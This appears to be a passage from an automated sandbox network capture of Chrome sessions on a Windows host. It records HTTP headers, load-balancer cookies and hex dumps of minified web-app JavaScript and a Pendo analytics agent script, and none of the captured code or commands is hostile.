                                                                                                                                                                                                                                                                                Cookie: AWSALBTG=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; AWSALBTGCORS=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; AWSALB=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW; AWSALBCORS=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC1432INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:10 GMT
                                                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                                                Content-Length: 4673944
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTG=acxaLruOLPw/yab1sZcNHxN5HcWi9fDtuEziXNXCquVXF5D5e7QFuvxrOF26E6fU4mR+Cq3mLlrysqcLUHuFBpBLHkQjFEr+9La11M+q8BUmLdBU6wJAOsCkeYfegqF5qCmsH8zsys6KtO4zeVp4L5XFy5MjegOGgPMRcfQfxBvO; Expires=Wed, 16 Oct 2024 18:05:10 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTGCORS=acxaLruOLPw/yab1sZcNHxN5HcWi9fDtuEziXNXCquVXF5D5e7QFuvxrOF26E6fU4mR+Cq3mLlrysqcLUHuFBpBLHkQjFEr+9La11M+q8BUmLdBU6wJAOsCkeYfegqF5qCmsH8zsys6KtO4zeVp4L5XFy5MjegOGgPMRcfQfxBvO; Expires=Wed, 16 Oct 2024 18:05:10 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALB=W/+9T91YS1CQ+1qhCNXXfH9dcCX/Xuxs1vy0g6mvF93W/A/ccA5azGrMZGaT6vzAjOsCFtEdQUCp7ppW7MhcOcyNvcGRyWrRh5LfoYjeozHP9XKv38LzHE/cfsZ4; Expires=Wed, 16 Oct 2024 18:05:10 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBCORS=W/+9T91YS1CQ+1qhCNXXfH9dcCX/Xuxs1vy0g6mvF93W/A/ccA5azGrMZGaT6vzAjOsCFtEdQUCp7ppW7MhcOcyNvcGRyWrRh5LfoYjeozHP9XKv38LzHE/cfsZ4; Expires=Wed, 16 Oct 2024 18:05:10 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                ETag: "1db18773acb7698"
                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 07 Oct 2024 05:10:30 GMT
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC14952INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 69 6e 64 65 78 2e 35 36 33 63 64 33 66 63 32 31 62 37 30 34 36 35 39 31 36 61 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 6f 3d 7b 36 31 32 34 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 69 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 78 7d 2c 52 5f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 2c 45 56 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 2c 65 7a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20
                                                                                                                                                                                                                                                                                Data Ascii: /*! For license information please see index.563cd3fc21b70465916a.js.LICENSE.txt */!function(){var e,t,n,r,o={61242:function(e,t,n){"use strict";n.d(t,{iN:function(){return x},R_:function(){return y},EV:function(){return E},ez:function(){return b}});var
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC1432INData Raw: 65 2c 45 2c 45 2c 30 2c 30 2c 6f 2c 6c 2c 62 2c 6f 2c 77 3d 5b 5d 2c 64 2c 53 29 2c 53 29 2c 6f 2c 53 2c 64 2c 6c 2c 72 3f 77 3a 53 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 42 65 28 78 2c 45 2c 45 2c 45 2c 5b 22 22 5d 2c 53 2c 30 2c 6c 2c 53 29 7d 7d 73 3d 75 3d 70 3d 30 2c 68 3d 67 3d 31 2c 62 3d 78 3d 22 22 2c 64 3d 61 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 38 3a 64 3d 31 2b 76 65 28 78 29 2c 70 3d 6d 3b 64 65 66 61 75 6c 74 3a 69 66 28 68 3c 31 29 69 66 28 31 32 33 3d 3d 79 29 2d 2d 68 3b 65 6c 73 65 20 69 66 28 31 32 35 3d 3d 79 26 26 30 3d 3d 68 2b 2b 26 26 31 32 35 3d 3d 4f 65 28 29 29 63 6f 6e 74 69 6e 75 65 3b 73 77 69 74 63 68 28 78 2b 3d 75 65 28 79 29 2c 79 2a 68 29 7b 63 61 73 65 20 33 38 3a 67 3d 75 3e 30 3f 31 3a 28 78 2b 3d 22 5c 66
                                                                                                                                                                                                                                                                                Data Ascii: e,E,E,0,0,o,l,b,o,w=[],d,S),S),o,S,d,l,r?w:S);break;default:Be(x,E,E,E,[""],S,0,l,S)}}s=u=p=0,h=g=1,b=x="",d=a;break;case 58:d=1+ve(x),p=m;default:if(h<1)if(123==y)--h;else if(125==y&&0==h++&&125==Oe())continue;switch(x+=ue(y),y*h){case 38:g=u>0?1:(x+="\f
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 5f 6d 75 6c 74 69 5f 76 61 6c 75 65 5f 22 3b 66 75 6e 63 74 69 6f 6e 20 58 65 28 65 29 7b 72 65 74 75 72 6e 20 79 65 28 6a 65 28 65 29 2c 62 65 29 2e 72 65 70 6c 61 63 65 28 2f 5c 7b 25 25 25 5c 3a 5b 5e 3b 5d 3b 7d 2f 67 2c 22 3b 22 29 7d 76 61 72 20 4a 65 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 7b 72 6f 6f 74 3a 21 30 2c 70 61 72 65 6e 74 53 65 6c 65 63 74 6f 72 73 3a 5b 5d 7d 2c 6c 3d 72 2e
                                                                                                                                                                                                                                                                                Data Ascii: _multi_value_";function Xe(e){return ye(je(e),be).replace(/\{%%%\:[^;];}/g,";")}var Je=function e(t){var n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},r=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{root:!0,parentSelectors:[]},l=r.
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 2c 69 3d 7b 69 63 6f 6e 3a 7b 74 61 67 3a 22 73 76 67 22 2c 61 74 74 72 73 3a 7b 76 69 65 77 42 6f 78 3a 22 30 20 30 20 31 30 32 34 20 31 30 32 34 22 2c 66 6f 63 75 73 61 62 6c 65 3a 22 66 61 6c 73 65 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 7b 74 61 67 3a 22 70 61 74 68 22 2c 61 74 74 72 73 3a 7b 64 3a 22 4d 39 38 38 20 35 34 38 63 2d 31 39 2e 39 20 30 2d 33 36 2d 31 36 2e 31 2d 33 36 2d 33 36 20 30 2d 35 39 2e 34 2d 31 31 2e 36 2d 31 31 37 2d 33 34 2e 36 2d 31 37 31 2e 33 61 34 34 30 2e 34 35 20 34 34 30 2e 34 35 20 30 20 30 30 2d 39 34 2e 33 2d 31 33 39 2e 39 20 34 33 37 2e 37 31 20 34 33 37 2e 37 31 20 30 20 30 30 2d 31 33 39 2e 39 2d 39 34 2e 33 43 36 32 39 20 38 33 2e 36 20 35 37 31 2e 34 20 37 32 20 35 31 32 20 37 32 63 2d 31 39 2e 39 20 30 2d 33 36
                                                                                                                                                                                                                                                                                Data Ascii: ,i={icon:{tag:"svg",attrs:{viewBox:"0 0 1024 1024",focusable:"false"},children:[{tag:"path",attrs:{d:"M988 548c-19.9 0-36-16.1-36-36 0-59.4-11.6-117-34.6-171.3a440.45 440.45 0 00-94.3-139.9 437.71 437.71 0 00-139.9-94.3C629 83.6 571.4 72 512 72c-19.9 0-36
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 2e 2e 22 29 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 5f 63 65 6c 6c 43 6f 75 6e 74 29 29 3b 69 66 28 65 3e 74 68 69 73 2e 5f 6c 61 73 74 4d 65 61 73 75 72 65 64 49 6e 64 65 78 29 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 67 65 74 53 69 7a 65 41 6e 64 50 6f 73 69 74 69 6f 6e 4f 66 4c 61 73 74 4d 65 61 73 75 72 65 64 43 65 6c 6c 28 29 2c 6e 3d 74 2e 6f 66 66 73 65 74 2b 74 2e 73 69 7a 65 2c 72 3d 74 68 69 73 2e 5f 6c 61 73 74 4d 65 61 73 75 72 65 64 49 6e 64 65 78 2b 31 3b 72 3c 3d 65 3b 72 2b 2b 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 5f 63 65 6c 6c 53 69 7a 65 47 65 74 74 65 72 28 7b 69 6e 64 65 78 3a 72 7d 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6f 7c 7c 69 73 4e 61 4e 28 6f 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 73 69 7a
                                                                                                                                                                                                                                                                                Data Ascii: ..").concat(this._cellCount));if(e>this._lastMeasuredIndex)for(var t=this.getSizeAndPositionOfLastMeasuredCell(),n=t.offset+t.size,r=this._lastMeasuredIndex+1;r<=e;r++){var o=this._cellSizeGetter({index:r});if(void 0===o||isNaN(o))throw Error("Invalid siz
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 69 74 69 6f 6e 4d 61 6e 61 67 65 72 2c 70 72 65 76 69 6f 75 73 43 65 6c 6c 73 43 6f 75 6e 74 3a 65 2e 72 6f 77 43 6f 75 6e 74 2c 70 72 65 76 69 6f 75 73 43 65 6c 6c 53 69 7a 65 3a 65 2e 72 6f 77 48 65 69 67 68 74 2c 70 72 65 76 69 6f 75 73 53 63 72 6f 6c 6c 54 6f 41 6c 69 67 6e 6d 65 6e 74 3a 65 2e 73 63 72 6f 6c 6c 54 6f 41 6c 69 67 6e 6d 65 6e 74 2c 70 72 65 76 69 6f 75 73 53 63 72 6f 6c 6c 54 6f 49 6e 64 65 78 3a 65 2e 73 63 72 6f 6c 6c 54 6f 52 6f 77 2c 70 72 65 76 69 6f 75 73 53 69 7a 65 3a 65 2e 68 65 69 67 68 74 2c 73 63 72 6f 6c 6c 4f 66 66 73 65 74 3a 76 2c 73 63 72 6f 6c 6c 54 6f 41 6c 69 67 6e 6d 65 6e 74 3a 73 2c 73 63 72 6f 6c 6c 54 6f 49 6e 64 65 78 3a 64 2c 73 69 7a 65 3a 6c 2c 73 69 7a 65 4a 75 73 74 49 6e 63 72 65 61 73 65 64 46 72 6f 6d
                                                                                                                                                                                                                                                                                Data Ascii: itionManager,previousCellsCount:e.rowCount,previousCellSize:e.rowHeight,previousScrollToAlignment:e.scrollToAlignment,previousScrollToIndex:e.scrollToRow,previousSize:e.height,scrollOffset:v,scrollToAlignment:s,scrollToIndex:d,size:l,sizeJustIncreasedFrom
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 74 2c 6f 6e 4b 65 79 44 6f 77 6e 3a 74 68 69 73 2e 5f 6f 6e 4b 65 79 44 6f 77 6e 7d 2c 6e 28 7b 6f 6e 53 65 63 74 69 6f 6e 52 65 6e 64 65 72 65 64 3a 74 68 69 73 2e 5f 6f 6e 53 65 63 74 69 6f 6e 52 65 6e 64 65 72 65 64 2c 73 63 72 6f 6c 6c 54 6f 43 6f 6c 75 6d 6e 3a 6f 2c 73 63 72 6f 6c 6c 54 6f 52 6f 77 3a 69 7d 29 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 67 65 74 53 63 72 6f 6c 6c 53 74 61 74 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 6f 70 73 2e 69 73 43 6f 6e 74 72 6f 6c 6c 65 64 3f 74 68 69 73 2e 70 72 6f 70 73 3a 74 68 69 73 2e 73 74 61 74 65 7d 7d 2c 7b 6b 65 79 3a 22 5f 75 70 64 61 74 65 53 63 72 6f 6c
                                                                                                                                                                                                                                                                                Data Ascii: .createElement("div",{className:t,onKeyDown:this._onKeyDown},n({onSectionRendered:this._onSectionRendered,scrollToColumn:o,scrollToRow:i}))}},{key:"_getScrollState",value:function(){return this.props.isControlled?this.props:this.state}},{key:"_updateScrol
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 75 6e 74 7c 7c 30 3d 3d 3d 74 2e 73 63 72 6f 6c 6c 4c 65 66 74 26 26 30 3d 3d 3d 74 2e 73 63 72 6f 6c 6c 54 6f 70 3f 65 2e 73 63 72 6f 6c 6c 4c 65 66 74 21 3d 3d 74 2e 73 63 72 6f 6c 6c 4c 65 66 74 7c 7c 65 2e 73 63 72 6f 6c 6c 54 6f 70 21 3d 3d 74 2e 73 63 72 6f 6c 6c 54 6f 70 3f 7b 73 63 72 6f 6c 6c 4c 65 66 74 3a 6e 75 6c 6c 21 3d 65 2e 73 63 72 6f 6c 6c 4c 65 66 74 3f 65 2e 73 63 72 6f 6c 6c 4c 65 66 74 3a 74 2e 73 63 72 6f 6c 6c 4c 65 66 74 2c 73 63 72 6f 6c 6c 54 6f 70 3a 6e 75 6c 6c 21 3d 65 2e 73 63 72 6f 6c 6c 54 6f 70 3f 65 2e 73 63 72 6f 6c 6c 54 6f 70 3a 74 2e 73 63 72 6f 6c 6c 54 6f 70 2c 73 63 72 6f 6c 6c 50 6f 73 69 74 69 6f 6e 43 68 61 6e 67 65 52 65 61 73 6f 6e 3a 52 65 7d 3a 6e 75 6c 6c 3a 7b 73 63 72 6f 6c 6c 4c 65 66 74 3a 30 2c 73 63
                                                                                                                                                                                                                                                                                Data Ascii: unt||0===t.scrollLeft&&0===t.scrollTop?e.scrollLeft!==t.scrollLeft||e.scrollTop!==t.scrollTop?{scrollLeft:null!=e.scrollLeft?e.scrollLeft:t.scrollLeft,scrollTop:null!=e.scrollTop?e.scrollTop:t.scrollTop,scrollPositionChangeReason:Re}:null:{scrollLeft:0,sc
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 75 72 6e 20 74 68 69 73 2e 72 69 67 68 74 3f 34 2a 28 74 68 69 73 2e 6c 65 66 74 3f 74 68 69 73 2e 6c 65 66 74 2e 63 6f 75 6e 74 3a 30 29 3e 33 2a 28 74 2d 31 29 3f 51 65 28 74 68 69 73 2c 65 29 3a 32 3d 3d 3d 28 69 3d 74 68 69 73 2e 72 69 67 68 74 2e 72 65 6d 6f 76 65 28 65 29 29 3f 28 74 68 69 73 2e 72 69 67 68 74 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 75 6e 74 2d 3d 31 2c 31 29 3a 28 31 3d 3d 3d 69 26 26 28 74 68 69 73 2e 63 6f 75 6e 74 2d 3d 31 29 2c 69 29 3a 30 3b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 63 6f 75 6e 74 29 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 65 66 74 50 6f 69 6e 74 73 5b 30 5d 3d 3d 3d 65 3f 32 3a 30 3b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6c 65 66 74 50 6f 69 6e 74 73 2e 6c 65 6e 67 74 68 26 26 74 68 69 73 2e 6c 65 66 74 50 6f 69 6e 74
                                                                                                                                                                                                                                                                                Data Ascii: urn this.right?4*(this.left?this.left.count:0)>3*(t-1)?Qe(this,e):2===(i=this.right.remove(e))?(this.right=null,this.count-=1,1):(1===i&&(this.count-=1),i):0;if(1===this.count)return this.leftPoints[0]===e?2:0;if(1===this.leftPoints.length&&this.leftPoint
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 2c 73 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 6f 2d 6c 29 3b 74 68 69 73 2e 5f 62 6f 74 74 6f 6d 4c 65 66 74 47 72 69 64 26 26 74 68 69 73 2e 5f 62 6f 74 74 6f 6d 4c 65 66 74 47 72 69 64 2e 72 65 63 6f 6d 70 75 74 65 47 72 69 64 53 69 7a 65 28 7b 63 6f 6c 75 6d 6e 49 6e 64 65 78 3a 6e 2c 72 6f 77 49 6e 64 65 78 3a 73 7d 29 2c 74 68 69 73 2e 5f 62 6f 74 74 6f 6d 52 69 67 68 74 47 72 69 64 26 26 74 68 69 73 2e 5f 62 6f 74 74 6f 6d 52 69 67 68 74 47 72 69 64 2e 72 65 63 6f 6d 70 75 74 65 47 72 69 64 53 69 7a 65 28 7b 63 6f 6c 75 6d 6e 49 6e 64 65 78 3a 63 2c 72 6f 77 49 6e 64 65 78 3a 73 7d 29 2c 74 68 69 73 2e 5f 74 6f 70 4c 65 66 74 47 72 69 64 26 26 74 68 69 73 2e 5f 74 6f 70 4c 65 66 74 47 72 69 64 2e 72 65 63 6f 6d 70 75 74 65 47 72 69 64 53 69 7a 65 28 7b
                                                                                                                                                                                                                                                                                Data Ascii: ,s=Math.max(0,o-l);this._bottomLeftGrid&&this._bottomLeftGrid.recomputeGridSize({columnIndex:n,rowIndex:s}),this._bottomRightGrid&&this._bottomRightGrid.recomputeGridSize({columnIndex:c,rowIndex:s}),this._topLeftGrid&&this._topLeftGrid.recomputeGridSize({


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                13192.168.2.64973534.111.138.514432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC564OUTGET /agent/static/74b07336-7560-45fc-7cd1-95032a784d52/pendo.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: citrix-sharefile-content.customer.pendo.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC907INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                access-control-expose-headers: *
                                                                                                                                                                                                                                                                                cache-control: max-age=450
                                                                                                                                                                                                                                                                                content-type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                date: Wed, 09 Oct 2024 18:05:11 GMT
                                                                                                                                                                                                                                                                                etag: "07a583de5d67536cbd8a65885c2ef3f7"
                                                                                                                                                                                                                                                                                expires: Wed, 09 Oct 2024 18:12:41 GMT
                                                                                                                                                                                                                                                                                last-modified: Wed, 09 Oct 2024 17:17:46 GMT
                                                                                                                                                                                                                                                                                server: istio-envoy
                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                x-goog-generation: 1728494266207575
                                                                                                                                                                                                                                                                                x-goog-hash: crc32c=gIFftw==
                                                                                                                                                                                                                                                                                x-goog-hash: md5=B6WD3l1nU2y9imWIXC7z9w==
                                                                                                                                                                                                                                                                                x-goog-metageneration: 1
                                                                                                                                                                                                                                                                                x-goog-storage-class: STANDARD
                                                                                                                                                                                                                                                                                x-goog-stored-content-encoding: gzip
                                                                                                                                                                                                                                                                                x-goog-stored-content-length: 163598
                                                                                                                                                                                                                                                                                x-guploader-uploadid: AHmUCY36tdghtF6cFIxBRUSrZDpZnxTWb2xkylRdPJP6Pe1pI3AxyFryXxcySTsMEKaK0c-g0TMwKDoh-w
                                                                                                                                                                                                                                                                                x-envoy-upstream-service-time: 51
                                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000
                                                                                                                                                                                                                                                                                Alt-Svc: clear
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC483INData Raw: 31 30 30 30 0d 0a 2f 2f 20 50 65 6e 64 6f 20 41 67 65 6e 74 20 57 72 61 70 70 65 72 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 50 65 6e 64 6f 2e 69 6f 2c 20 49 6e 63 2e 0a 2f 2f 20 45 6e 76 69 72 6f 6e 6d 65 6e 74 3a 20 20 20 20 70 72 6f 64 75 63 74 69 6f 6e 0a 2f 2f 20 41 67 65 6e 74 20 56 65 72 73 69 6f 6e 3a 20 20 32 2e 32 34 39 2e 31 0a 2f 2f 20 49 6e 73 74 61 6c 6c 65 64 3a 20 20 20 20 20 20 32 30 32 34 2d 31 30 2d 30 39 54 31 37 3a 31 37 3a 34 34 5a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 50 65 6e 64 6f 43 6f 6e 66 69 67 29 20 7b 0a 2f 2a 0a 40 6c 69 63 65 6e 73 65 20 68 74 74 70 73 3a 2f 2f 61 67 65 6e 74 2e 70 65 6e 64 6f 2e 69 6f 2f 6c 69 63 65 6e 73 65 73 0a 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 48 62 2c 6a 62 2c 57 62 29 7b 21 66 75
                                                                                                                                                                                                                                                                                Data Ascii: 1000// Pendo Agent Wrapper// Copyright 2024 Pendo.io, Inc.// Environment: production// Agent Version: 2.249.1// Installed: 2024-10-09T17:17:44Z(function (PendoConfig) {/*@license https://agent.pendo.io/licenses*/!function(Hb,jb,Wb){!fu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1390INData Raw: 6e 2c 69 3d 5b 5d 2c 72 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6f 3d 65 7c 7c 30 2c 61 3d 28 74 3c 30 3f 72 2b 74 3a 74 7c 7c 72 29 2d 28 6f 3d 30 3c 3d 6f 3f 6f 3a 72 2b 6f 29 3b 69 66 28 30 3c 61 29 69 66 28 69 3d 6e 65 77 20 41 72 72 61 79 28 61 29 2c 74 68 69 73 2e 63 68 61 72 41 74 29 66 6f 72 28 6e 3d 30 3b 6e 3c 61 3b 6e 2b 2b 29 69 5b 6e 5d 3d 74 68 69 73 2e 63 68 61 72 41 74 28 6f 2b 6e 29 3b 65 6c 73 65 20 66 6f 72 28 6e 3d 30 3b 6e 3c 61 3b 6e 2b 2b 29 69 5b 6e 5d 3d 74 68 69 73 5b 6f 2b 6e 5d 3b 72 65 74 75 72 6e 20 69 7d 7d 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 7c 7c 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 70 6c 61
                                                                                                                                                                                                                                                                                Data Ascii: n,i=[],r=this.length,o=e||0,a=(t<0?r+t:t||r)-(o=0<=o?o:r+o);if(0<a)if(i=new Array(a),this.charAt)for(n=0;n<a;n++)i[n]=this.charAt(o+n);else for(n=0;n<a;n++)i[n]=this[o+n];return i}}String.prototype.trim||(String.prototype.trim=function(){return this.repla
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1390INData Raw: 74 5d 28 29 7d 7d 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 61 28 22 68 65 78 22 29 3b 28 74 3d 69 3f 63 28 74 29 3a 74 29 2e 63 72 65 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 6c 7d 2c 74 2e 75 70 64 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 72 65 61 74 65 28 29 2e 75 70 64 61 74 65 28 65 29 7d 3b 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 65 29 7b 76 61 72 20 6e 3d 72 5b 65 5d 3b 74 5b 6e 5d 3d 61 28 6e 29 7d 72 65 74 75 72 6e 20 74 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 65 76 61 6c 28 22 72 65 71 75 69 72 65 28 27 63 72 79 70 74 6f 27 29 22 29 2c 69 3d 65 76 61 6c 28 22 72 65 71 75 69 72 65 28 27 62 75 66
                                                                                                                                                                                                                                                                                Data Ascii: t]()}},d=function(){var t=a("hex");(t=i?c(t):t).create=function(){return new l},t.update=function(e){return t.create().update(e)};for(var e=0;e<r.length;++e){var n=r[e];t[n]=a(n)}return t},c=function(t){var n=eval("require('crypto')"),i=eval("require('buf
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC841INData Raw: 5b 6e 3e 3e 32 5d 7c 3d 28 32 32 34 7c 74 3e 3e 31 32 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 3a 28 74 3d 36 35 35 33 36 2b 28 28 31 30 32 33 26 74 29 3c 3c 31 30 7c 31 30 32 33 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 72 29 29 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 32 34 30 7c 74 3e 3e 31 38 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 31 32 38 7c 74 3e 3e 31 32 26 36 33 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 29 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 31 32 38 7c 74 3e 3e 36 26 36 33 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 29 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 31 32 38 7c 36 33 26 74 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 29 3b 74 68 69 73 2e 6c 61 73 74 42 79 74 65 49 6e 64 65 78 3d 6e 2c 74 68 69 73 2e 62 79 74 65 73 2b 3d 6e 2d 74 68 69 73 2e 73 74 61 72 74 2c 36
